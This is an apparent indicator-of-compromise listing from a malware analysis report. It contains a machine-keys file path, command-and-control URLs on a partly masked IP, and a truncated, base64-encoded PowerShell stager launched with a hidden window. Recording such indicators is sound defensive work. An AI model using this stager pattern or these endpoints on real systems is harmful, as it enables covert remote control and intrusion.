Technical Information
- %PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\8da55548fd9d5d756d10892c77be51c4_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- http://91.#21.7.87/news.php
- http://91.#21.7.87/admin/get.php
- http://91.#21.7.87/login/process.php
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAEEAYgBsAEUALgBQAFMAVgBFAFIAUwBpAG8ATgAuAE0AYQBKAE8AUgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUATQBiAGwAWQAuAEcARQBU...' (with hidden window)